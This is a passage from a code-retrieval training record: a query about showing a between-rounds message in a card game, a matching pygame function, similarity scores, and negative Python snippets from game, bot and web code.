response_code = update.callback_query[\"data\"] # caution_ok or caution_cancel\n request_id = context.user_data[\"reviewed_request\"]\n log.info(\"Confirm req:%s %s\", request_id, response_code)\n\n request_details = context.bot_data[request_id]\n\n if response_code == \"caution_ok\":\n # They're in good health, let's go\n\n # send a location message, if this info is available in the request\n if \"latitude\" in request_details:\n self.updater.bot.send_location(\n chat_id, request_details[\"latitude\"], request_details[\"longitude\"]\n )\n\n # then send the rest of the details as text\n message = c.MSG_FULL_DETAILS % request_details\n\n if \"remarks\" in request_details:\n message += \"\\n\" + c.MSG_OTHER_REMARKS\n for remark in request_details[\"remarks\"]:\n message += \"- %s\\n\" % remark\n\n if \"hasDisabilities\" in request_details:\n message += \"\\n%s\\n\" % (c.MSG_DISABILITY % request_details)\n\n message += \"\\n\" + c.MSG_LET_ME_KNOW\n self.updater.bot.send_message(\n chat_id=chat_id,\n text=message,\n parse_mode=ParseMode.MARKDOWN,\n reply_markup=InlineKeyboardMarkup(k.handling_choices),\n )\n\n else: # caution_cancel\n # eventually they chose not to handle this request\n # TODO ask them why, maybe they're sick and they need help? Discuss whether this is relevant\n self.send_message(chat_id, c.MSG_NO_WORRIES_LATER)\n context.user_data[\"reviewed_request\"] = None\n context.user_data[\"state\"] = c.State.AVAILABLE\n self.backend.update_request_status(request_id, \"CANCELLED\")", "def save(self, *args, **kwargs):\n if not self.require_confirm_email:\n User.objects.filter(is_active=False, deactivation_reason=\"pending\").update(\n is_active=True, deactivation_reason=None\n )\n if not self.invite_question_text:\n self.invite_question_text = \"What is your favourite book?\"\n super().save(*args, **kwargs)", "def execute_civ_discard(index_to_discard: int, log: bool = True) -> None:\n game_state.remove_single_tiles_from_player(\n [index_to_discard],\n game_state.get_auction_winning_player(),\n log=log,\n )\n game_state.decrement_num_civs_to_discard()\n mark_player_passed_if_no_disasters(game_state.get_auction_winning_player())\n\n # if no disasters to be resolved, resume play from after\n # auction starter\n if not game_state.disasters_must_be_resolved():\n game_state.set_current_player(game_state.get_auction_start_player())\n game_state.advance_current_player()", "def test_reactivation_for_unregistered_user(self, email_user):\r\n response_data = self.reactivation_email(self.unregisteredUser)\r\n\r\n self.assertFalse(response_data['success'])", "def test_discard_action(self):\n self.plr.test_input = [\"discard silver\", \"finish selecting\"]\n self.plr.play_card(self.card)\n self.assertEqual(self.plr.piles[Piles.HAND].size(), 2)\n self.assertEqual(self.plr.actions.get(), 2)\n self.assertEqual(self.plr.buys.get(), 1)\n self.assertNotIn(\"Silver\", self.plr.piles[Piles.HAND])", "async def team_unignore(self, ctx: commands.Context):\n await self.config.user(ctx.author).do_not_message.set(False)\n await ctx.send('Okay, I\\'ll include you back in team-wide DMs.')" ]
[ "0.6619172", "0.65421534", "0.63608795", "0.6252194", "0.62353194", "0.6222551", "0.61789745", "0.6149395", "0.61379594", "0.6117161", "0.6086858", "0.6077924", "0.6073165", "0.60582376", "0.60207057", "0.60002977", "0.59929824", "0.5937757", "0.593176", "0.59203535", "0.5888317", "0.58854973", "0.5876241", "0.58461815", "0.5845953", "0.58290064", "0.5824021", "0.5810428", "0.5774078", "0.5760513", "0.5730184", "0.5727028", "0.5719213", "0.5712494", "0.569602", "0.56713146", "0.56707263", "0.56659585", "0.56418097", "0.56418097", "0.56418097", "0.56418097", "0.5628323", "0.5627331", "0.56135094", "0.5564286", "0.5553009", "0.55511534", "0.5538483", "0.55264467", "0.55264467", "0.5493888", "0.54898596", "0.54897773", "0.54896", "0.54874194", "0.5454041", "0.5440779", "0.54360706", "0.5430588", "0.542803", "0.5422573", "0.5410228", "0.53916657", "0.53900766", "0.53846043", "0.5377666", "0.53740996", "0.53653234", "0.53620553", "0.5361535", "0.5348276", "0.5344653", "0.5344445", "0.5343346", "0.5341422", "0.5331381", "0.5326362", "0.5326036", "0.53223634", "0.53167146", "0.53077775", "0.5305748", "0.5305279", "0.5304685", "0.5291263", "0.5289273", "0.52815866", "0.52719086", "0.5262374", "0.52619606", "0.5261655", "0.5256375", "0.525084", "0.5249647", "0.5233938", "0.5233146", "0.5233142", "0.52320886", "0.52315813" ]
0.72036105
0
print message where cards usually displayed until Ready button is clicked for next round.
def mesgBetweenRounds(self, message): font = UIC.Medium_Text y_offset = (UIC.Disp_Height * (1 - (UIC.Hand_Row_Fraction * 0.8))) for message_string in message: text_surface = font.render(message_string, True, UIC.Black) text_rect = text_surface.get_rect() text_rect.center = ((UIC.Disp_Width * 0.5), y_offset) y_offset = y_offset + UIC.Medium_Text_Feed self.display.blit(text_surface, text_rect)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def progress_game(self):\r\n\r\n if self.actions == len(self.players):\r\n # Reveal the 3 first cards\r\n output_text = \"Dealing the flop...\"\r\n\r\n self.new_output.emit(output_text)\r\n self.community_cards.flop()\r\n\r\n if self.actions == 2 * len(self.players):\r\n # Reveal a 4th card\r\n output_text = \"Dealing the turn...\"\r\n\r\n self.new_output.emit(output_text)\r\n self.community_cards.turn()\r\n\r\n if self.actions == 3 * len(self.players):\r\n # Reveal a 5th card\r\n output_text = \"Dealing the river...\"\r\n\r\n self.new_output.emit(output_text)\r\n self.community_cards.river()\r\n\r\n if self.actions == 4 * len(self.players):\r\n self.showdown()", "def display(self):\n\t\tprint('The button in the window was clicked!')", "def printStartMsg(self):\n\n print(\"\\nSTARING THE GAME\")\n print(\"HAVE FUN!\\n\")", "def display_message():", "def printWaiting(self):\n\t\tfor wait in self.w:\n\t\t\tw_print=\"\"\n\t\t\tfor c in wait:\n\t\t\t\tif c:\n\t\t\t\t\tw_print += str(c[1])\n\t\t\t\telse:\n\t\t\t\t\tw_print += 'NO'\n\t\t\t\tw_print += \" \"\n\t\t\tprint w_print", "def show_results(self):\r\n\r\n if self.player_cards > self.computer_cards: # player wins\r\n print('\\nCongratulations!!')\r\n print('You WIN by {0} / {1}'.format(self.player_cards, self.computer_cards))\r\n elif self.player_cards < self.computer_cards: # computer wins\r\n print('\\nToo bad!!')\r\n print('You LOST by {0} / {1}'.format(self.player_cards, self.computer_cards))\r\n else: # tied\r\n print('You TIED by {0} / {1}'.format(self.player_cards, self.computer_cards))", "def _complete(self):\n self._last = self._touch\n if self._game.getWall().getBricks() == []:\n m = 'Congratulations!\\nYou Won\\n\\nClick to play again'\n f = 30\n h = GAME_HEIGHT*(2.0/3.0)\n self._playAgain()\n elif self._game.getPlayerLives() == 0:\n m = 'Game Over\\nClick to try again'\n f = 30\n h = GAME_HEIGHT*(2.0/3.0)-10\n self._playAgain()\n self._countdownTime = 0\n self._countdownMessage = GLabel(text='3', font_size=40,x=GAME_WIDTH / 2.0,\n y=GAME_HEIGHT*(2.0/3.0), halign='center',\n valign='middle', linecolor=colormodel.WHITE)\n self._pausedMessage = GLabel(text=m,font_size=f,x=GAME_WIDTH / 2.0,\n y=h, halign='center', valign='middle',\n linecolor=colormodel.WHITE)", "def welcome_screen(self):\n print()\n print('P*O*K*E*R')\n print('Welcome to a 5-card poker game,\\n' +\n 'The goal is the get a better hand than the AI.')\n print('To do this you get one chance to swap cards' +\n 'that are in your hand')\n print('You swap like this:\\n' +\n '1. Choose how many cards you want to swap\\n' +\n '2. Write the number of the card(s) you want to swap, like this:\\n' +\n 'If you want to swap card 2, type in 2.\\n' +\n 'If you want to swap card 1 and 4, type 1,4')\n print('Next both your and AI hand is shown,\\n' +\n 'and the winner is declared.')\n print('For information on what hand beats what, \\n' +\n 'and what happens when both players have an equally good hand,\\n' +\n 'please follow the link below:\\n' +\n 'https://github.com/oljung/portfolio-project-three\\n' +\n 'NOTE! Ctrl + c will terminate the app, use right click to copy')\n message = 'Would you like to play a round? Y(es) or N(o): '\n answer = InputHandler.input_bool(message)\n if answer:\n self.run_game()", "def print_status(self):\r\n\t\tif VERBOSE:\r\n\r\n\t\t\tprint( 'Player : ')\r\n\t\t\tfor h in self.hands:\r\n\t\t\t\tprint('\\t' + str(h))\r\n\t\t\tprint( 'Dealer:\\n\\t' + str(self.dealer))\r\n\t\t\tprint( '-----------------------')", "def showMessage(self):", "def present_status(self):\n output = ''\n if self.stats['hand']:\n output += 'Ready: \\n'\n for card in sorted(self.stats['hand'], key=itemgetter('name')):\n output += card_format(card) + '\\n'\n output += '\\n'\n if self.stats['active']:\n output += 'Active: \\n'\n for card in self.stats['active']:\n output += card_format(card) + '\\n'\n if self.stats['discard']:\n output += '\\nSpent: \\n'\n for card in self.stats['discard']:\n output += card_format(card) + '\\n'\n output += '\\n'\n output += 'Spells: \\n'\n for power in self.stats['powers']:\n output += '%s x %d\\n' % (power, self.stats['powers'][power])\n if self.stats['opponent']:\n output += '\\nCurrent Activity:\\n'\n output += '%s' % (card_format(self.stats['opponent']))\n header_print('Status')\n print(output)", "def print_next_choices(self) -> None:\n print(f'Now you are in Room #{self._id}')\n print('You have the following choices:')\n for option in range(1, len(self._choices)):\n print(f'Option {option}:')\n self._choices[option].print_choice_msg()", "def build_deck_screen_end_screen_warning_display(screen,buttons, screen_status, button_status, card_database_filter, user):\n if button_status.build_deck_screen_end_screen_warning_button_display == 'character card':\n button = Button('Missing A','' ,(122,33,38),1050, 0, 150, 30,font_size = 18)\n button.update()\n button.draw(screen)\n\n button = Button('Character Card!','' ,(122,33,38),1050, 30, 150, 30,font_size = 18)\n button.update()\n button.draw(screen)\n\n button = Button('','' ,(122,33,38),1050, 60, 150, 40,font_size = 18)\n button.update()\n button.draw(screen)\n\n button = Button('ok','' ,(22,143,78),1100, 62, 40, 30,font_size = 16)\n button.update()\n button.draw(screen)\n\n elif button_status.build_deck_screen_end_screen_warning_button_display == '4 copy each':\n button = Button('No More Than 4','' ,(122,33,38),1050, 0, 150, 30,font_size = 15)\n button.update()\n button.draw(screen)\n\n button = Button('Copies For Each Card!','' ,(122,33,38),1050, 30, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('','' ,(122,33,38),1050, 60, 150, 40,font_size = 18)\n button.update()\n button.draw(screen)\n\n button = Button('ok','' ,(22,143,78),1100, 62, 40, 30,font_size = 16)\n button.update()\n button.draw(screen)", "def display(self):\n for i in range(0, len(self.__drawn)):\n if self.__drawn[i]:\n print(str(i+1) + \". You drew a short straw!\")\n else:\n print(str(i+1) + \". You're okay.\")", "def show_msg(self):\n if self.result and self.success_msg:\n print color_str('g', '\\n'.join(self.success_msg))\n elif self.result == False and self.fail_msg:\n print color_str('r', '\\n'.join(self.fail_msg))\n if self.stat_msg:\n print color_str('b', '\\n'.join(self.stat_msg))", "def print_contents(self):\n try:\n # We only wait for 0.001 seconds.\n self.print_all_contents(indef_wait=False)\n except NotYourTurnError:\n # It's not our turn, so try again the next time this function is called.\n pass", "def print_menu():\r\n print(\"==============================================\")\r\n print(\"What do you want to do now? \")\r\n print(\"==============================================\")\r\n print(\"Available options:\")\r\n i = 1\r\n for a in available_actions:\r\n if current_state in a[\"valid_states\"]:\r\n # Only hint about the action if the current state allows it\r\n print(\" %i) %s\" % (i, a[\"description\"]))\r\n i += 1\r\n print()", "def show_game_mission():\n print_bold(\"任务:\")\n print(\"\\t选择李维可以休息的小屋...\")\n print_bold(\"TIP:\")\n print(\"保持警惕,周围有敌人!\")\n print_dotted_line()", "def drawDescription(self):\n print(\"\\nPress the following keys to run the features of the GoPiGo3.\")\n print(\"To move the motors, make sure you have a fresh set of batteries powering the GoPiGo3.\\n\")", "def showdown(self):\r\n\r\n poker_hands = []\r\n message = \"\"\r\n for player in self.players:\r\n poker_hands.append(player.hand.best_poker_hand(self.community_cards.cards))\r\n\r\n # Reveal all cards when the round is over\r\n player.reveal_cards()\r\n\r\n if poker_hands[0].type > poker_hands[1].type:\r\n message = \"Player {} won! \\nPoker hand >{}< won against >{}<\".format(\r\n self.players[0].name, str(poker_hands[0].type), str(poker_hands[1].type))\r\n self.players[0].credits += self.pot\r\n\r\n if poker_hands[0].type < poker_hands[1].type:\r\n message = \"Player {} won! \\nPoker hand >{}< won against >{}<\".format(\r\n self.players[1].name, str(poker_hands[1].type), str(poker_hands[0].type))\r\n self.players[1].credits += self.pot\r\n\r\n if poker_hands[0].type == poker_hands[1].type:\r\n if poker_hands[0].highest_values > poker_hands[1].highest_values:\r\n message = \"Player {} won! \\nHighest value >{}< won against >{}<\".format(\r\n self.players[0].name, str(poker_hands[0].highest_values), str(poker_hands[1].highest_values))\r\n self.players[0].credits += self.pot\r\n\r\n elif poker_hands[0].highest_values < poker_hands[1].highest_values:\r\n message = \"Player {} won! \\nHighest value >{}< won against >{}<\".format(\r\n self.players[1].name, str(poker_hands[1].highest_values), str(poker_hands[0].highest_values))\r\n self.players[1].credits += self.pot\r\n\r\n elif poker_hands[0].highest_values == poker_hands[1].highest_values:\r\n message = \"It is a draw! Both players had >{}< and highest value >{}<\".format(\r\n poker_hands[0].type.name, str(poker_hands[0].highest_values))\r\n\r\n for player in self.players:\r\n player.credits += (self.pot // len(self.players))\r\n else:\r\n self.game_message_warning.emit(\"Incorrect comparison of poker hands\")\r\n\r\n self.new_output.emit(message)\r\n self.game_message.emit(message)\r\n self.new_credits.emit()\r\n self.new_pot.emit()", "def display_starting_message(): # opening message\n starting_message = \"Is your cat plotting to kill you?? \\nLet's find out. \\n(Please note that this is merely a pythonic presentation of an app created by The Oatmeal. \\nI do not claim credit for its brilliance. I'm just trying to learn Python.)\"\n print(starting_message)", "def text_output(self):\n print(self.board)\n print()", "def intro_instructions():\n print(\"The board will be updated after each move.\")\n print(\"Watch both the board and the python prompt after each move.\")\n print(\"Player 1 is white and player 2 is orange\")\n print(\"Green boxes are snakes and yellow boxes are ladders.\")\n print(\"If you hit any part of the snake(not just the head), you will slide down to the snakes tail\")\n print(\"If you hit any part of the ladder(not just the bottom), you will climb to the ladder's top\")\n print(\"May the luckiest player win\")", "def next(self):\n print(f\" {colored('[', 'yellow')}{bold(self.progress[self.pos])}{colored(']', 'yellow')} \"\n f\"{bold('Processing, please wait...')}\",\n end=\"\\r\",\n flush=True\n )\n self.increment()", "def print_intro(self):\n \n print('Did you know that birds hold the record for longest animal migrations?')", "def lobby_screen_pick_deck_warning_button_display(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, action, player2):\n if button_status.lobby_screen_end_screen_warning_button_display == 'deck less than 40 cards':\n button = Button('You need at least 40','' ,(122,33,38),1050, 580, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('cards in your deck!','' ,(122,33,38),1050, 610, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('','' ,(122,33,38),1050, 640, 150, 40,font_size = 18)\n button.update()\n button.draw(screen)\n\n button = Button('ok','' ,(22,143,78),1100, 642, 40, 30,font_size = 16)\n button.update()\n button.draw(screen)\n\n elif button_status.lobby_screen_end_screen_warning_button_display == 'no deck':\n button = Button('Please pick a deck','' ,(122,33,38),1050, 580, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('or build a new one!','' ,(122,33,38),1050, 610, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('','' ,(122,33,38),1050, 640, 150, 40,font_size = 18)\n button.update()\n button.draw(screen)\n\n button = Button('ok','' ,(22,143,78),1100, 642, 40, 30,font_size = 16)\n button.update()\n button.draw(screen)", "def set_info_text(self):\n if not self.vars[\"enabled\"].get():\n msg = \"{} disabled\".format(self.tabname.title())\n elif self.vars[\"enabled\"].get() and not self.vars[\"ready\"].get():\n msg = \"Waiting for {}...\".format(self.tabname)\n else:\n msg = \"Displaying {}\".format(self.tabname)\n logger.debug(msg)\n self.set_info(msg)", "def display_message():\n\tprint(\"In this chapter we will be learning how to write functions\")", "def prepare_screen_end_screen_warning_display(screen,buttons, screen_status, button_status, card_database_filter, user):\n if button_status.prepare_screen_end_screen_warning_button_display == 'deck less than 40 cards':\n button = Button('You need at least 40','' ,(122,33,38),1050, 0, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('cards in your deck!','' ,(122,33,38),1050, 30, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('','' ,(122,33,38),1050, 60, 150, 40,font_size = 18)\n button.update()\n button.draw(screen)\n\n button = Button('ok','' ,(22,143,78),1100, 62, 40, 30,font_size = 16)\n button.update()\n button.draw(screen)\n\n elif button_status.prepare_screen_end_screen_warning_button_display == 'no deck':\n button = Button('Please pick a deck','' ,(122,33,38),1050, 0, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('or build a new one!','' ,(122,33,38),1050, 30, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('','' ,(122,33,38),1050, 60, 150, 40,font_size = 18)\n button.update()\n button.draw(screen)\n\n button = Button('ok','' ,(22,143,78),1100, 62, 40, 30,font_size = 16)\n button.update()\n button.draw(screen)\n\n elif button_status.prepare_screen_end_screen_warning_button_display == 'no character':\n button = Button('Please pick a character','' ,(122,33,38),1050, 0, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('for your opponent!','' ,(122,33,38),1050, 30, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('','' ,(122,33,38),1050, 60, 150, 40,font_size = 18)\n button.update()\n button.draw(screen)\n\n button = Button('ok','' ,(22,143,78),1100, 62, 40, 30,font_size = 16)\n button.update()\n button.draw(screen)\n\n elif button_status.prepare_screen_end_screen_warning_button_display == 'no difficulty':\n button = Button('Please pick a difficulty','' ,(122,33,38),1050, 0, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('for your opponent!','' ,(122,33,38),1050, 30, 150, 30,font_size = 13)\n button.update()\n button.draw(screen)\n\n button = Button('','' ,(122,33,38),1050, 60, 150, 40,font_size = 18)\n button.update()\n button.draw(screen)\n\n button = Button('ok','' ,(22,143,78),1100, 62, 40, 30,font_size = 16)\n button.update()\n button.draw(screen)", "def print(self):\n if self.passed():\n self.print_passed()\n else:\n self.print_failed()", "def _do_outputs(self):\n self._puzzle.display_revealed_puzzle()\n hint = self._puzzle.get_hint()\n self._console.write(hint)\n print(\"\")\n self._jumper.draw_jumper()\n print(\"\")\n\n # These ifs end the game\n if self._puzzle.is_solved():\n self._keep_playing = False\n self._puzzle.display_win_screen()\n \n if self._puzzle.incorrect_guesses >= 4:\n self._keep_playing = False\n self._puzzle.display_loss_screen()", "def display_message():\n\tprint(\"Learnt to write functions, which are named blocks of code that are designed to do one specific job.\")", "def display(self):\n while (True):\n self.print()\n choice = self.get_choice()\n if (choice == len(self.options)):\n break\n else:\n self.options[choice].function()", "def display(self,message):\r\n \r\n print(message)", "def sprint(self):\n self.buttons = []\n self.screen.blit(self.background_image, (0, 0))\n self.create_button((self.width // 2 - 257, self.height // 8 - 85), 501, 200, Colors.BLACK, \"20L\")\n self.create_button((self.width // 2 - 257, self.height // 8 * 3 - 81), 501, 200, Colors.BLACK, \"40L\")\n self.create_button((self.width // 2 - 257, self.height // 8 * 5 - 86), 501, 200, Colors.BLACK, \"100L\")\n self.create_button((self.width // 2 - 257, self.height // 8 * 7 - 85), 501, 200, Colors.BLACK, \"1000L\")\n self.show_buttons()\n self.show_text_in_buttons()\n pygame.display.flip()", "def display_result(self) -> None:\n winner = self.state.winner\n if winner:\n self._display_message(winner + ' wins!')\n else:\n self._display_message('Draw')\n\n self._display_message(\n f'\\n{self.state.player1} has {self.state.player1_score} wins'\n )\n self._display_message(\n f'{self.state.player2} has {self.state.player2_score} wins\\n'\n )", "def on_press(self):\n if self.book.is_completed:\n self.book.mark_required()\n else:\n self.book.mark_completed()\n self.set_color()\n self.text = str(self.book)\n self.top_label.set_label_text()\n text = 'You {} \\'{}\\'.{}'.format(\n 'completed' if self.book.is_completed else 'need to read',\n self.book.title,\n (' Great job!' if self.book.is_completed else ' Get started!') if self.book.is_long() else ''\n )\n self.warn_label.set_label_text(text)", "def print_hand(self):\n if self.cheating:\n print(\"You're cheating!\")\n print(\"until you reroll it!\")\n print(\"\"\"\nYou rolled:\na = [ {} ]\nb = [ {} ]\n\nYou are in Stage {}\n \"\"\".format(self.die_a, self.die_b, self.stage))", "def show_quest(self):\n for quest_line in self.qtext:\n print(quest_line)\n time.sleep(1)", "def ready(self):\n self.stdout.write('READY\\n')\n self.stdout.flush()", "def play():\n display_starting_message()\n print(\"\")\n print(\"*\"*10)\n for question_number, question in enumerate(list_of_questions):\n print(question)\n print(\"\")\n for responses in list_of_questions[question]:\n print(responses)\n pick_one = input(\"pick one: \")\n check_murder_sauce(question, pick_one)\n\n murder_sauce_result(murder_sauce)", "def displayDiscarded(self):\n print(\"Discarded :\")\n if len(self.discarded) == 0:\n print(\"*no discard yet*\")\n else:\n for card in self.discarded:\n print(card.toString(), end=\" \")\n print()", "def show_game_mission():\n print_bold(\"Misija:\")\n print(\"\\tOdaberi kućicu u kojoj se Talion može odmoriti ...\")\n print_bold(\"SAVJET:\")\n print(\"PAZI kako biraš jer neprijatelji su blizu!\")\n print_dotted_line()", "def battle_screen_history_bar_display(ai_settings, screen, buttons,screen_status, button_status, card_database_filter, user, player2):\n\n\n for number,text in button_status.battle_screen_history_bar_text_dict.items():\n if int(number) == 1:\n button_text = Button(text,'', (0,0,0),250, 0, 600, 30, font_size = 13, alpha = 100)\n button_text.update()\n button_text.draw(screen)\n else:\n pass\n\n button_details = Button('+','', (0,0,0),850, 0, 100, 30,font_size = 25, alpha = 100)\n button_details.update()\n button_details.draw(screen)\n\n if button_status.battle_screen_history_bar_detail_display == True:\n i = 0\n for number,text in button_status.battle_screen_history_bar_text_dict.items():\n\n if int(number) % 2 == 1 and text != '':\n if text == \"Game Started!\":\n button_odd = Button(text,'', (0,160,0),200, 30 + 30*(i), 800, 30, font_size = 13)\n button_odd.update()\n button_odd.draw(screen)\n i += 1\n elif text == \"Your turn has started\":\n button_odd = Button(text,'', (0,160,0),200, 30 + 30*(i), 800, 30, font_size = 13)\n button_odd.update()\n button_odd.draw(screen)\n i += 1\n elif text == \"Opponent's turn has started\":\n button_odd = Button(text,'', (160,0,0),200, 30 + 30*(i), 800, 30, font_size = 13)\n button_odd.update()\n button_odd.draw(screen)\n i += 1\n else:\n button_odd = Button(text,'', (160,160,160),200, 30 + 30*(i), 800, 30, font_size = 13)\n button_odd.update()\n button_odd.draw(screen)\n i += 1\n elif int(number) % 2 == 0 and text != '':\n if text == \"Game Started!\":\n button_even = Button(text,'', (0,160,0),200, 60 + 30 * (i-1), 800, 30, font_size = 13)\n button_even.update()\n button_even.draw(screen)\n i += 1\n elif text == \"Your turn has started\":\n button_even = Button(text,'', (0,160,0),200, 60 + 30 * (i-1), 800, 30, font_size = 13)\n button_even.update()\n button_even.draw(screen)\n i += 1\n elif text == \"Opponent's turn has started\":\n button_even = Button(text,'', (160,0,0),200, 60 + 30 * (i-1), 800, 30, font_size = 13)\n button_even.update()\n button_even.draw(screen)\n i += 1\n else:\n button_even = Button(text,'', (130,130,130),200, 60 + 30 * (i-1), 800, 30, font_size = 13)\n button_even.update()\n button_even.draw(screen)\n i += 1", "def event_loop(self):\n if self.message_counter:\n if not self.msg:\n self.showdialog()\n else:\n self.msg.setText(\n \"COMET encounterd {} error(s)\".format(self.message_counter).ljust(\n 70\n )\n )", "def instructions():\n\t\n\tprint \\\n\t\"\"\"\n\tToday we will play the perennial favorite game of...\n\tRock! Paper!! Scissors!!!.\n\tThe objective of the game is to outthink your opponent (in this case me) and defeat.\n\tThe rules are very simple\n\t1. Paper covers the Rock\n\t2. Rock breaks the Scissors\n\t3. Scissors cut the Paper\n\t\n\tChoose your move from the following:\n\t1. Paper (p)\n\t2. Rock (r)\n\t3. Scissors (s)\n\t\n\tAre you ready? Alright then, let's play...\n\t\"\"\"", "def progress(self, msg):\n logging.info(\"UI-Test: \" + msg)\n with step(\"UI test progress: \" + msg):\n pass\n if len(self.state) > 0:\n self.state += \"\\n\"\n self.state += \"UI: \" + msg", "def example(self):\n while self.check_end() == False:\n plt.pause(0.25)\n end = self.update_board(random.choice(self.get_actions()), True)", "def welcome_banner():\n print('\\t*' * 10)\n print('\\t\\tWelcome!')\n print('\\tPut your knowledge to the test with this Ultimate Quiz Questions!')\n print('\\t*' * 10)\n print()", "def game_over(self):\n if self.missed == 5:\n print(\"You Lost! Better Luck Next Time!\")\n else:\n print(\"You Won! Congratulations!\")\n self.print_full_phrase()", "def battle_screen_character_1_button_display(screen,buttons, screen_status, button_status, card_database_filter, user):\n button_basic_info = Button('Lv: ' + user.character_card.level + ' HP: ' + user.character_card.health + ' Card #: ' + str(len(user.hand_list)),'', (0,0,0),1000, 0, 200, 30, alpha = 100)\n button_basic_info.update()\n button_basic_info.draw(screen)\n\n if ('stage-2-character-action-1' in screen_status.battle_screen_action_indicator\n and screen_status.battle_screen_player2_action_display_indicator == False):\n button_action_pointer = Button('>>','',(92,13,78),1000,132,50,23,alpha = 0)\n button_action_pointer.update()\n button_action_pointer.draw(screen)\n elif ('stage-2-character-action-2' in screen_status.battle_screen_action_indicator\n and screen_status.battle_screen_player2_action_display_indicator == False):\n button_action_pointer = Button('>>','',(92,13,78),1000,155,50,23, alpha = 0)\n button_action_pointer.update()\n button_action_pointer.draw(screen)\n elif ('stage-2-character-action-3' in screen_status.battle_screen_action_indicator\n and screen_status.battle_screen_player2_action_display_indicator == False):\n button_action_pointer = Button('>>','',(92,13,78),1000,178,50,23, alpha = 0)\n button_action_pointer.update()\n button_action_pointer.draw(screen)\n elif ('stage-2-other-action-' in screen_status.battle_screen_action_indicator\n and screen_status.battle_screen_player2_action_display_indicator == False\n and 'detail' not in screen_status.battle_screen_action_indicator):\n x = screen_status.battle_screen_action_indicator.replace('stage-2-other-action-','')\n button_action_pointer = Button('>>','',(92,13,78),1000,220+23*(int(x)/10-1),50,23, alpha = 0)\n button_action_pointer.update()\n button_action_pointer.draw(screen)", "def print_status(self, state, auction_round):\n\n if state['bid_winner'] is None:\n self.log('No bidder on this round {}.\\n'.format(auction_round))\n else:\n self.log('Player {} won {} on this round {} with bid amount {}.\\n'.format(\n state['bid_winner'], state['bid_item'], auction_round, state['winning_bid']))\n\n self.log('Remaining time:')\n for idx in range(len(self.players)):\n if self.players[idx]['valid']:\n self.log('\\t{} has {} seconds remaining'\n .format(self.players[idx]['name'], self.players[idx]['remain_time']))\n\n self.log('Remaining wealth:')\n for idx in range(len(self.players)):\n if self.players[idx]['valid']:\n self.log('\\t{} has {} dollars remaining'.format(self.players[idx]['name'], self.players[idx]['wealth']))\n\n self.log('------------------------------------\\n')\n\n if state['finished']:\n self.log('Game over\\n{}\\n'.format(state['reason']))", "def card_success(self): \n handles = self.driver.window_handles\n while len(handles) != 3:\n handles = self.driver.window_handles\n self.driver.switch_to_window(handles[2])\n WebDriverWait(self.driver, 20).until(EC.visibility_of_element_located((By.CSS_SELECTOR,'.success'))) \n self.driver.find_element_by_class_name(\"success\").click()\n self.driver.switch_to_window(handles[0])", "def status(s):\n print('\\033[1m{0}\\033[0m'.format(s))\n time.sleep(2)", "def print_intro(self):\n \n print('Did you know mammals tend to have the shortest migration routes because walking takes more energy than flying or swimming?')", "def intro():\n os.system('cls')\n print(\"-------------------------\")\n print(\" MOON PHASE CALENDAR\")\n print(\"-------------------------\")", "def showMessage(self, message):\r\n print message", "def set_display_message(self, title=\"\", speaker=\"\"):\r\n if self.recording:\r\n self.talkInfoString.setText(\"RECORDING\\n\\nTime remaining:\")\r\n else:\r\n self.talkInfoString.setText(\"NEXT TALK\\nTitle: %s\\nSpeaker: %s\\n\\nTime until recording:\" % (title, speaker))", "def __display_login_info(self):\n print(f'\\nYour card has been created\\n'\n f'Your card number:\\n'\n # f'{self.__card_display()}\\n' # uncomment this line and comment out line below for pretty display\n f'{self.card_number}\\n'\n f'Your card PIN:\\n'\n f'{self.__account_pin}\\n', )", "def print_start_game():\n print(HANGMAN_ASCII_ART)\n print(MAX_TRIES)", "def print_choice_msg(self) -> None:\n pass", "def print_board(self):\n \n # How to show empty/p1/p2\n VALS = \".XO\"\n\n print(\"\\n a b c d e f g\")\n print(\" /--+-+-+-+-+-+--\\\\\")\n for r in range(_HEIGHT - 1, -1, -1):\n s = \"%s |\" % r\n for c in range(_WIDTH):\n # Print mark next to most recent move\n mark = \">\" if self.last_play_rc == (r, c) else \" \"\n s += mark + VALS[self.board[r * 7 + c]]\n print(s + \" |\")\n print(\" \\\\--+-+-+-+-+-+--/\")\n print(\" a b c d e f g\\n\")", "def print_confirmation(action):\n\tprint(Fore.YELLOW + Style.BRIGHT + action + Style.RESET_ALL + \"\\n\")", "def success(msg):\n click.secho(msg, fg='green')", "def print_intro(player, board):\n print(f'\\n+++++++++++++++++++++++ DOCTOR WHO ADVENTURE: THE MISSING TARDIS +++++++++++++++++++++++\\n')\n print(f'\"Doctor, this doesn\\'t feel right,\" {player[\"Name\"][0]} said hesitantly, \"Are'\n f' you sure we should be here? \\nThe TARIDS really didn\\'t want to land just now.\"'\n f' \"The old girl is just being temperamental, {player[\"Name\"][0]}. \\nDon\\'t worry,\"'\n f' the DOCTOR said nonchalantly as he fiddled with the monitors at'\n f' the console. \\n\"The note sent to the psychic paper was from an old friend. '\n f'We are just going to pop by,\\nhelp him out, and be back in'\n f' time for tea at Space Florida!\" he continued \\nas he sauntered out the TARDIS.\\n')\n sleep(2)\n print(f'\"I thought we were going swimming at Poosh!\" {player[\"Name\"][0]} yelled as'\n f' they followed the DOCTOR out the door. \\nThe TARDIS doors slammed shut '\n f'behind {player[\"Name\"][0]}, and the unmistakable sound of the TARDIS \\n'\n f'dematerialising was heard. The DOCTOR and {player[\"Name\"][0]} could only stare'\n f' as the TARDIS disappeared from view.\\n')\n sleep(2)\n print(f'Before the DOCTOR could say anything, the two heard the unmistakable screams of \"EX-TER-MIN-ATE\" \\n'\n f'from down the hall. They quickly looked at each other, 